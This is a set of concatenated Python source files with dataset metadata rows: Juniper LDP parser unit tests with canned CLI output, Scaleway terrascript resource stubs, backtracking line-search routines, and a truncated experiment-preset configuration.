'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'disabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-inet': 'enabled',
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-egress-fec-capability': {
'ldp-egress-fec-capability': 'entropy-label-capability'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-job-overview': {
'ldp-inbound-read-job-loop-quantum': 100,
'ldp-inbound-read-job-time-quantum': 1000,
'ldp-outbound-read-job-loop-quantum': 100,
'ldp-outbound-read-job-time-quantum': 1000,
'ldp-read-job-loop-quantum': 100,
'ldp-read-job-time-quantum': 1000,
'ldp-write-job-loop-quantum': 100,
'ldp-write-job-time-quantum': 1000
},
'ldp-label-allocation': {
'ldp-global-label-current-allocs': 0,
'ldp-label-alloc-failure': 0,
'ldp-label-current-allocs': 0,
'ldp-label-total-allocs': 0,
'ldp-label-total-frees': 0
},
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-mtu-discovery': 'disabled',
'ldp-p2mp': {
'ldp-p2mp-no-rsvp-tunneling-enabled': 'disabled',
'ldp-p2mp-recursive-route-enabled': 'disabled'
},
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-reference-count': 2,
'ldp-route-acknowledgement': 'enabled',
'ldp-route-preference': 9,
'ldp-router-id': '10.204.14.100',
'ldp-session-count': {
'ldp-control-mode': 'ordered',
'ldp-retention-mode': 'liberal',
'ldp-session-nonexistent': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-sr-mapping-client': 'disabled',
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-link-protection-timeout': 120,
'ldp-instance-make-before-break-switchover-delay': 3,
'ldp-instance-make-before-break-timeout': 30,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-transport-preference': 'IPv4',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_output_5 = {'execute.return_value': '''
show ldp overview
Instance: master
Router ID: 10.204.1.100
Message id: 4
Configuration sequence: 1
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
Capabilities enabled: none
Protocol modes:
Distribution: unsolicited
Retention: liberal
Control: ordered
Sessions:
Connecting: 1
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protecton timeout: 0
Interface addresses advertising:
10.1.2.2
'''}
golden_parsed_output_5 = {
'ldp-overview-information': {
'ldp-overview': {
'ldp-configuration-sequence': 1,
'ldp-deaggregate': 'disabled',
'ldp-explicit-null': 'disabled',
'ldp-gr-overview': {
'ldp-gr-helper': 'enabled',
'ldp-gr-max-neighbor-reconnect-time': 120000,
'ldp-gr-max-neighbor-recovery-time': 240000,
'ldp-gr-reconnect-time': 60000,
'ldp-gr-recovery-time': 160000,
'ldp-gr-restart': 'enabled',
'ldp-gr-restarting': 'false'
},
'ldp-igp-overview': {
'ldp-igp-sync-session-up-delay': 10,
'ldp-tracking-igp-metric': 'disabled'
},
'ldp-instance-capability': {
'ldp-capability': 'none'
},
'ldp-instance-name': 'master',
'ldp-interface-address': {
'interface-address': '10.1.2.2'
},
'ldp-ipv6-tunneling': 'disabled',
'ldp-loopback-if-added': 'no',
'ldp-message-id': 4,
'ldp-p2mp-transit-lsp-chaining': 'disabled',
'ldp-protocol-modes': {
'ldp-control-mode': 'ordered',
'ldp-distribution-mode': 'unsolicited',
'ldp-retention-mode': 'liberal'
},
'ldp-route-preference': 9,
'ldp-router-id': '10.204.1.100',
'ldp-session-count': {
'ldp-session-connecting': 1
},
'ldp-session-protect-overview': {
'ldp-session-protect': 'disabled',
'ldp-session-protect-timeout': 0
},
'ldp-strict-targeted-hellos': 'disabled',
'ldp-te-overview': {
'ldp-te-bgp-igp': 'disabled',
'ldp-te-both-ribs': 'disabled',
'ldp-te-mpls-forwarding': 'disabled'
},
'ldp-timer-overview': {
'ldp-instance-keepalive-interval': 10,
'ldp-instance-keepalive-timeout': 30,
'ldp-instance-label-withdraw-delay': 60,
'ldp-instance-link-hello-hold-time': 15,
'ldp-instance-link-hello-interval': 5,
'ldp-instance-targeted-hello-hold-time': 45,
'ldp-instance-targeted-hello-interval': 15
},
'ldp-transit-lsp-route-stats': 'disabled',
'ldp-unicast-transit-lsp-chaining': 'disabled'
}
}
}
golden_parsed_output_6 = {
"ldp-overview-information": {
"ldp-overview": {
"ldp-auto-targeted-session": {
"ldp-auto-targeted-dyn-tun-ses-count": 0,
"ldp-auto-targeted-session-enabled": "disabled"
},
"ldp-bgp-export": "enabled",
"ldp-configuration-sequence": 2,
"ldp-control-mode": "ordered",
"ldp-deaggregate": "disabled",
"ldp-explicit-null": "disabled",
"ldp-gr-overview": {
"ldp-gr-helper": "enabled",
"ldp-gr-max-neighbor-reconnect-time": 120000,
"ldp-gr-max-neighbor-recovery-time": 240000,
"ldp-gr-reconnect-time": 60000,
"ldp-gr-recovery-time": 160000,
"ldp-gr-restart": "enabled",
"ldp-gr-restarting": "false"
},
"ldp-igp-overview": {
"ldp-igp-sync-session-up-delay": 10,
"ldp-tracking-igp-metric": "disabled"
},
"ldp-inet": "enabled",
"ldp-instance-capability": {
"ldp-capability": "none"
},
"ldp-instance-egress-fec-capability": {
"ldp-egress-fec-capability": "entropy-label-capability"
},
"ldp-instance-name": "master",
"ldp-interface-address": {
"interface-address": "10.169.14.157"
},
"ldp-ipv6-tunneling": "disabled",
"ldp-job-overview": {
"ldp-inbound-read-job-loop-quantum": 100,
"ldp-inbound-read-job-time-quantum": 1000,
"ldp-outbound-read-job-loop-quantum": 100,
"ldp-outbound-read-job-time-quantum": 1000,
"ldp-read-job-loop-quantum": 100,
"ldp-read-job-time-quantum": 1000,
"ldp-write-job-loop-quantum": 100,
"ldp-write-job-time-quantum": 1000
},
"ldp-label-allocation": {
"ldp-global-label-current-allocs": 0,
"ldp-label-alloc-failure": 0,
"ldp-label-current-allocs": 3,
"ldp-label-total-allocs": 7,
"ldp-label-total-frees": 4
},
"ldp-loopback-if-added": "no",
"ldp-message-id": 10,
"ldp-mtu-discovery": "disabled",
"ldp-p2mp": {
"ldp-p2mp-no-rsvp-tunneling-enabled": "disabled",
"ldp-p2mp-recursive-route-enabled": "disabled"
},
"ldp-p2mp-transit-lsp-chaining": "disabled",
"ldp-reference-count": 3,
"ldp-retention-mode": "liberal",
"ldp-route-acknowledgement": "enabled",
"ldp-route-preference": 9,
"ldp-router-id": "10.169.14.240",
"ldp-session-count": {
"ldp-control-mode": "ordered",
"ldp-retention-mode": "liberal",
"ldp-session-nonexistent": 1
},
"ldp-session-operational": 1,
"ldp-session-protect-overview": {
"ldp-session-protect": "disabled",
"ldp-session-protect-timeout": 0
},
"ldp-sr-mapping-client": "disabled",
"ldp-strict-targeted-hellos": "disabled",
"ldp-te-overview": {
"ldp-te-bgp-igp": "disabled",
"ldp-te-both-ribs": "disabled",
"ldp-te-mpls-forwarding": "disabled"
},
"ldp-timer-overview": {
"ldp-instance-keepalive-interval": 10,
"ldp-instance-keepalive-timeout": 30,
"ldp-instance-label-withdraw-delay": 60,
"ldp-instance-link-hello-hold-time": 15,
"ldp-instance-link-hello-interval": 5,
"ldp-instance-link-protection-timeout": 120,
"ldp-instance-make-before-break-switchover-delay": 3,
"ldp-instance-make-before-break-timeout": 30,
"ldp-instance-targeted-hello-hold-time": 45,
"ldp-instance-targeted-hello-interval": 15
},
"ldp-transit-lsp-route-stats": "disabled",
"ldp-transport-preference": "IPv4",
"ldp-unicast-transit-lsp-chaining": "disabled"
}
}
}
golden_output_6 = {'execute.return_value': '''
show ldp overview
Instance: master
Reference count: 3
Router ID: 10.169.14.240
LDP inet: enabled
Transport preference: IPv4
Message id: 10
Configuration sequence: 2
Deaggregate: disabled
Explicit null: disabled
IPv6 tunneling: disabled
Strict targeted hellos: disabled
Loopback if added: no
Route preference: 9
Unicast transit LSP chaining: disabled
P2MP transit LSP chaining: disabled
Transit LSP statistics based on route statistics: disabled
LDP route acknowledgement: enabled
BGP export: enabled
LDP mtu discovery: disabled
LDP SR Mapping Client: disabled
Capabilities enabled: none
Egress FEC capabilities enabled: entropy-label-capability
Downstream unsolicited Sessions:
Nonexistent: 1
Retention: liberal
Control: ordered
Operational: 1
Retention: liberal
Control: ordered
Auto targeted sessions:
Auto targeted: disabled
Dynamic tunnel session count: 0
P2MP:
Recursive route: disabled
No rsvp tunneling: disabled
Timers:
Keepalive interval: 10, Keepalive timeout: 30
Link hello interval: 5, Link hello hold time: 15
Targeted hello interval: 15, Targeted hello hold time: 45
Label withdraw delay: 60, Make before break timeout: 30
Make before break switchover delay: 3
Link protection timeout: 120
Graceful restart:
Restart: enabled, Helper: enabled, Restart in process: false
Reconnect time: 60000, Max neighbor reconnect time: 120000
Recovery time: 160000, Max neighbor recovery time: 240000
Traffic Engineering:
Bgp igp: disabled
Both ribs: disabled
Mpls forwarding: disabled
IGP:
Tracking igp metric: disabled
Sync session up delay: 10
Session protection:
Session protection: disabled
Session protection timeout: 0
Interface addresses advertising:
10.169.14.121
10.169.14.157
LDP Job:
Read job time quantum: 1000, Write job time quantum: 1000
Read job loop quantum: 100, Write job loop quantum: 100
Backup inbound read job time quantum: 1000, Backup outbound read job time quantum: 1000
Backup inbound read job loop quantum: 100, Backup outbound read job loop quantum: 100
Label allocation:
Current number of LDP labels allocated: 3
Total number of LDP labels allocated: 7
Total number of LDP labels freed: 4
Total number of LDP label allocation failure: 0
Current number of labels allocated by all protocols: 0
'''}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLDPOverview(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse()
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output)
def test_golden_2(self):
self.device = Mock(**self.golden_output_2)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_2)
def test_golden_3(self):
self.device = Mock(**self.golden_output_3)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_3)
def test_golden_4(self):
self.device = Mock(**self.golden_output_4)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_4)
def test_golden_5(self):
self.device = Mock(**self.golden_output_5)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_5)
def test_golden_6(self):
self.device = Mock(**self.golden_output_6)
obj = ShowLDPOverview(device=self.device)
parsed_output = obj.parse()
self.assertEqual(parsed_output, self.golden_parsed_output_6)
# ====================================================
# Unit test for 'show ldp session {ipaddress} detail'
# ====================================================
class TestShowLDPSessionIpaddressDetail(unittest.TestCase):
'''unit test for "show ldp session {ipaddress} detail'''
device = Device(name='aDevice')
maxDiff = None
empty_output = {'execute.return_value': ''}
golden_parsed_output = {
"ldp-session-information": {
"ldp-session": {
"ldp-connection-state": "Open",
"ldp-graceful-restart-local": "disabled",
"ldp-graceful-restart-remote": "disabled",
"ldp-holdtime": "30",
"ldp-keepalive-interval": "10",
"ldp-keepalive-time": "3",
"ldp-local-address": "10.34.2.250",
"ldp-local-helper-mode": "enabled",
"ldp-local-label-adv-mode": "Downstream unsolicited",
"ldp-local-maximum-reconnect": "120000",
"ldp-local-maximum-recovery": "240000",
"ldp-mtu-discovery": "disabled",
"ldp-neg-label-adv-mode": "Downstream unsolicited",
"ldp-neighbor-address": "10.169.14.240",
"ldp-neighbor-count": "1",
"ldp-neighbor-types": {
"ldp-neighbor-type": "discovered"
},
"ldp-remaining-time": "23",
"ldp-remote-address": "10.169.14.240",
"ldp-remote-helper-mode": "enabled",
"ldp-remote-label-adv-mode": "Downstream unsolicited",
"ldp-retry-interval": "1",
"ldp-session-address": {
"interface-address": "10.169.14.157"
},
"ldp-session-capabilities-advertised": {
"ldp-capability": "none"
},
"ldp-session-capabilities-received": {
"ldp-capability": "none"
},
"ldp-session-flags": {
"ldp-session-flag": "none"
},
"ldp-session-id": "10.34.2.250:0--10.169.14.240:0",
"ldp-session-max-pdu": "4096",
"ldp-session-nsr-state": "Not in sync",
"ldp-session-protection": {
"ldp-session-protection-state": "disabled"
},
"ldp-session-role": "Passive",
"ldp-session-state": "Operational",
"ldp-up-time": "00:00:47"
}
}
}
golden_output = {
'execute.return_value':
'''
show ldp session 10.169.14.240 detail
Address: 10.169.14.240, State: Operational, Connection: Open, Hold time: 23
Session ID: 10.34.2.250:0--10.169.14.240:0
Next keepalive in 3 seconds
Passive, Maximum PDU: 4096, Hold time: 30, Neighbor count: 1
Neighbor types: discovered
Keepalive interval: 10, Connect retry interval: 1
Local address: 10.34.2.250, Remote address: 10.169.14.240
Up for 00:00:47
Capabilities advertised: none
Capabilities received: none
Protection: disabled
Session flags: none
Local - Restart: disabled, Helper mode: enabled
Remote - Restart: disabled, Helper mode: enabled
Local maximum neighbor reconnect time: 120000 msec
Local maximum neighbor recovery time: 240000 msec
Local Label Advertisement mode: Downstream unsolicited
Remote Label Advertisement mode: Downstream unsolicited
Negotiated Label Advertisement mode: Downstream unsolicited
MTU discovery: disabled
Nonstop routing state: Not in sync
Next-hop addresses received:
10.169.14.157
'''
}
def test_empty(self):
self.device = Mock(**self.empty_output)
obj = ShowLdpSessionIpaddressDetail(device=self.device)
with self.assertRaises(SchemaEmptyParserError):
parsed_output = obj.parse(ipaddress='10.169.14.240')
def test_golden(self):
self.device = Mock(**self.golden_output)
obj = ShowLdpSessionIpaddressDetail(device=self.device)
parsed_output = obj.parse(ipaddress='10.169.14.240')
self.assertEqual(parsed_output, self.golden_parsed_output)
if __name__ == '__main__':
unittest.main()
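Every test class above leans on the same idiom: unittest.mock.Mock accepts dotted keyword names, so Mock(**{'execute.return_value': text}) builds a stand-in pyATS device whose execute() call returns canned CLI output for the parser to consume. A self-contained sketch of just that mechanism (standard library only; the ShowLDP* parser classes are not needed to see it work):

from unittest.mock import Mock

canned = 'Address           State        Connection  Hold time  Adv. Mode'
device = Mock(**{'execute.return_value': canned})
# Any call signature returns the canned text, which is exactly what the
# parse() implementations read back via device.execute(<show command>).
assert device.execute('show ldp session') == canned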
| 39.766325
| 99
| 0.510955
| 6,109
| 62,115
| 5.154526
| 0.046325
| 0.035282
| 0.004573
| 0.01048
| 0.942456
| 0.927244
| 0.909492
| 0.899743
| 0.891264
| 0.888342
| 0
| 0.054491
| 0.365677
| 62,115
| 1,561
| 100
| 39.7918
| 0.744702
| 0.030283
| 0
| 0.739591
| 0
| 0
| 0.535713
| 0.151096
| 0
| 0
| 0
| 0
| 0.020439
| 1
| 0.020439
| false
| 0.000757
| 0.003785
| 0
| 0.081756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6fe91ca39969e5c100442103b74bf0563e25b2e9
| 1,916
|
py
|
Python
|
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 4
|
2022-02-07T21:08:14.000Z
|
2022-03-03T04:41:28.000Z
|
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/scaleway/r.py
|
hugovk/python-terrascript
|
08fe185904a70246822f5cfbdc9e64e9769ec494
|
[
"BSD-2-Clause"
] | 2
|
2022-02-06T01:49:42.000Z
|
2022-02-08T14:15:00.000Z
|
# terrascript/scaleway/r.py
import terrascript
class scaleway_account_ssh_key(terrascript.Resource):
pass
class scaleway_baremetal_server(terrascript.Resource):
pass
class scaleway_instance_ip(terrascript.Resource):
pass
class scaleway_instance_ip_reverse_dns(terrascript.Resource):
pass
class scaleway_instance_volume(terrascript.Resource):
pass
class scaleway_instance_security_group(terrascript.Resource):
pass
class scaleway_instance_security_group_rules(terrascript.Resource):
pass
class scaleway_instance_server(terrascript.Resource):
pass
class scaleway_instance_placement_group(terrascript.Resource):
pass
class scaleway_k8s_cluster_beta(terrascript.Resource):
pass
class scaleway_k8s_pool_beta(terrascript.Resource):
pass
class scaleway_lb_beta(terrascript.Resource):
pass
class scaleway_lb_ip_beta(terrascript.Resource):
pass
class scaleway_lb_backend_beta(terrascript.Resource):
pass
class scaleway_lb_certificate_beta(terrascript.Resource):
pass
class scaleway_lb_frontend_beta(terrascript.Resource):
pass
class scaleway_registry_namespace_beta(terrascript.Resource):
pass
class scaleway_rdb_instance_beta(terrascript.Resource):
pass
class scaleway_object_bucket(terrascript.Resource):
pass
class scaleway_user_data(terrascript.Resource):
pass
class scaleway_server(terrascript.Resource):
pass
class scaleway_token(terrascript.Resource):
pass
class scaleway_ssh_key(terrascript.Resource):
pass
class scaleway_ip(terrascript.Resource):
pass
class scaleway_ip_reverse_dns(terrascript.Resource):
pass
class scaleway_security_group(terrascript.Resource):
pass
class scaleway_security_group_rule(terrascript.Resource):
pass
class scaleway_volume(terrascript.Resource):
pass
class scaleway_volume_attachment(terrascript.Resource):
pass
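Each stub class above maps a Terraform resource type to a Python name; the bodies are empty because terrascript.Resource supplies all behavior, including rendering. A hedged usage sketch (this assumes the python-terrascript API of this era: a Terrascript container, += registration, and JSON rendering via str(); verify against the installed version):

import terrascript
from terrascript.scaleway.r import scaleway_instance_ip

config = terrascript.Terrascript()
config += scaleway_instance_ip('my_ip')  # rendered as resource "scaleway_instance_ip" "my_ip" { ... }
print(str(config))                       # JSON-formatted Terraform configuration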
| 16.10084
| 67
| 0.799061
| 222
| 1,916
| 6.576577
| 0.18018
| 0.258219
| 0.456849
| 0.536986
| 0.855479
| 0.781507
| 0.487671
| 0.143836
| 0
| 0
| 0
| 0.001211
| 0.138309
| 1,916
| 118
| 68
| 16.237288
| 0.883101
| 0.013048
| 0
| 0.491525
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.491525
| 0.016949
| 0
| 0.508475
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
82f96bf00a0e6f16dfdd3f6ac7fa4c0016bc0ddc
| 4,671
|
py
|
Python
|
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
temas/IV.optimizacion_convexa_y_machine_learning/algoritmos/Python/line_search.py
|
123972/analisis-numerico-computo-cientifico
|
9ad310579d6376a85ad83862605aa48e5fcdc88c
|
[
"Apache-2.0"
] | null | null | null |
from utils import norm_residual, logarithmic_barrier
def line_search_by_backtracking(f, dir_desc, x,
                                der_direct, alpha=.15, beta=.5):
'''
Line search that sufficiently decreases f restricted to a ray in the direction dir_desc.
Args:
        alpha (float): parameter in line search with backtracking, typically .15
        beta (float): parameter in line search with backtracking, typically .5
f (lambda expression): definition of function f.
dir_desc (array): descent direction.
x (array): numpy array that holds values where line search will be performed.
der_direct (float): directional derivative of f.
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
    t = 1
    if alpha > 1/2:
        print('alpha must be less than or equal to 1/2')
        t = -1
    if beta > 1:
        print('beta must be less than 1')
        t = -1
    if t != -1:
        eval1 = f(x + t*dir_desc)
        eval2 = f(x) + alpha*t*der_direct
        while eval1 > eval2:
            t = beta*t
            eval1 = f(x + t*dir_desc)
            eval2 = f(x) + alpha*t*der_direct
    return t
def line_search_for_residual_by_backtracking(r_primal, r_dual, dir_desc_primal,
                                             dir_desc_dual, x, nu,
                                             norm_residual_eval,
                                             alpha=.15, beta=.5):
'''
    Line search that sufficiently decreases the residual for Newton's infeasible initial point method
restricted to a ray in the direction dir_desc.
Args:
r_primal (fun): definition of primal residual as function definition or lambda expression.
r_dual (fun): definition of dual residual as function definition or lambda expression.
dir_desc_primal (array): descent direction for primal variable.
dir_desc_dual (array): descent direction for dual variable.
x (array): numpy array that holds values where line search will be performed.
nu (array): numpy array that holds values where line search will be performed.
norm_residual_eval (float): norm of residual that has both r_primal and r_dual evaluations in
x and nu
        alpha (float): parameter in line search with backtracking, typically .15
        beta (float): parameter in line search with backtracking, typically .5
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
t=1
if alpha > 1/2:
print('alpha must be less than or equal to 1/2')
t=-1
if beta>1:
print('beta must be less than 1')
t=-1
if t!=-1:
feas_primal = r_primal(x + t*dir_desc_primal)
feas_dual = r_dual(nu + t*dir_desc_dual )
eval1 = norm_residual(feas_primal, feas_dual)
eval2 = (1-alpha*t)*norm_residual_eval
while eval1 > eval2:
t=beta*t
feas_primal = r_primal(x + t*dir_desc_primal)
feas_dual = r_dual(nu + t*dir_desc_dual )
eval1 = norm_residual(feas_primal, feas_dual)
eval2 = (1-alpha*t)*norm_residual_eval
return t
def line_search_for_log_barrier_by_backtracking(f,dir_desc,x,t_path,
constraint_inequalities,
der_direct, alpha=.15, beta=.5):
'''
Line search that sufficiently decreases f restricted to a ray in the direction dir_desc.
Args:
alpha (float): parameter in line search with backtracking, typically .15
beta (float): parameter in line search with backtracking, typically .5
f (lambda expression): definition of function f.
dir_desc (array): descent direction.
x (array): numpy array that holds values where line search will be performed.
t_path (float): barrier parameter along the central path.
constraint_inequalities (fun): inequality constraints passed to logarithmic_barrier.
der_direct (float): directional derivative of the log-barrier function.
Returns:
t (float): positive number for stepsize along dir_desc that sufficiently decreases f.
'''
t=1
if alpha > 1/2:
print('alpha must be less than or equal to 1/2')
t=-1
if beta>1:
print('beta must be less than 1')
t=-1
if t!=-1:
eval1 = logarithmic_barrier(f,x + t*dir_desc, t_path,constraint_inequalities)
eval2 = logarithmic_barrier(f,x, t_path,constraint_inequalities) + alpha*t*der_direct
while eval1 > eval2:
t=beta*t
eval1=logarithmic_barrier(f,x + t*dir_desc, t_path,constraint_inequalities)
eval2=logarithmic_barrier(f,x, t_path,constraint_inequalities) + alpha*t*der_direct
return t
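# --- Hypothetical usage sketch (not part of the original file): exercises
# line_search_by_backtracking on a simple quadratic. Assumes numpy is
# available; f, x and the descent direction below are made up for the demo.
if __name__ == '__main__':
    import numpy as np
    f = lambda v: v.dot(v)               # f(x) = ||x||^2, minimized at the origin
    x = np.array([2.0, 1.0])
    gradient = 2 * x                     # exact gradient of f
    dir_desc = -gradient                 # steepest-descent direction
    der_direct = gradient.dot(dir_desc)  # directional derivative (negative)
    t = line_search_by_backtracking(f, dir_desc, x, der_direct)
    print('step size t =', t, '-> new point:', x + t * dir_desc)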
| 45.794118
| 101
| 0.627703
| 646
| 4,671
| 4.390093
| 0.147059
| 0.054302
| 0.012694
| 0.042313
| 0.850846
| 0.841326
| 0.799013
| 0.766573
| 0.766573
| 0.75
| 0
| 0.020719
| 0.297367
| 4,671
| 102
| 102
| 45.794118
| 0.843388
| 0.465211
| 0
| 0.87931
| 0
| 0
| 0.08143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.051724
| false
| 0
| 0.017241
| 0
| 0.12069
| 0.103448
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d217461745e9c2dab591b71af01dd3a18f395bcd
| 5,613
|
py
|
Python
|
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
presets.py
|
pirakd/DeepProp
|
e43f6e12220da38a3bda51918bd75bb7c48dec31
|
[
"MIT"
] | null | null | null |
experiments_20 = {
'data':
{'n_experiments': 20,
'max_set_size': 500,
'network_filename': 'H_sapiens.net', #'S_cerevisiae.net'
'directed_interactions_filename': 'KPI_dataset',
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': False,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'balanced_kpi_prop_scores',
'random_seed': 0,
'normalization_method': 'power', # 'standard' / 'power'
'split_type': 'normal'}, # 'regular' / 'harsh'
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [64, 32],
'classifier_layers': [64, 32],
'pulling_func': 'mean',
'exp_emb_size': 4,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0
},
'train':
{'intermediate_loss_weight': 0,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 32,
'test_batch_size': 32,
'n_epochs': 1000,
'eval_interval': 3,
'learning_rate': 1e-3,
'max_evals_no_imp': 3,
'optimizer': 'ADAMW' # 'ADAM' / 'ADAMW'
}}
experiments_50 = {
'data':
{'n_experiments': 50,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': 'KPI_dataset',
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': True,
'save_prop_scores': False,
'prop_scores_filename': 'balanced_kpi_prop_scores',
'random_seed': 0,
'normalization_method': 'standard'
},
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [128, 64],
'classifier_layers': [128, 64],
'pulling_func': 'mean',
'exp_emb_size': 12,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0
},
'train':
{'intermediate_loss_weight': 0.5,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 32,
'test_batch_size': 32,
'n_epochs': 4,
'eval_interval': 2,
'learning_rate': 5e-4,
'max_evals_no_imp': 3,
'optimizer': 'ADAMW' # 'ADAM' / 'ADAMW'
}}
experiments_0 = {
'data':
{'n_experiments': 0,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': ['KPI'],
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
'load_prop_scores': True,
'save_prop_scores': False,
'balance_dataset': True,
'prop_scores_filename': 'drug_KPI_0',
'random_seed': 0,
'normalization_method': 'power', # 'standard' / 'power'
'split_type': 'normal'}, # 'regular' / 'harsh'
'propagation':
{'alpha': 0.8,
'eps': 1e-6,
'n_iterations': 200},
'model':
{'feature_extractor_layers': [128, 64],
'classifier_layers': [64],
'pulling_func': 'mean',
'exp_emb_size': 16,
'feature_extractor_dropout': 0,
'classifier_dropout': 0,
'pair_degree_feature': 0,
},
'train':
{'intermediate_loss_weight': 0.5,
'intermediate_loss_type': 'BCE',
'focal_gamma': 1,
'train_val_test_split': [0.66, 0.14, 0.2], # sum([train, val, test])=1
'train_batch_size': 4,
'test_batch_size': 32,
'n_epochs': 4,
'eval_interval': 2,
'learning_rate': 1e-3,
'max_evals_no_imp': 3,
'optimizer': 'ADAMW' # 'ADAM' / 'ADAMW'
}}
experiments_all_datasets = {
'data':
{'n_experiments': 0,
'max_set_size': 500,
'network_filename': 'H_sapiens.net',
'directed_interactions_filename': ['KPI', 'STKE', 'EGFR', 'E3','PDI'],
'sources_filename': 'drug_targets.txt',
'terminals_filename': 'drug_expressions.txt',
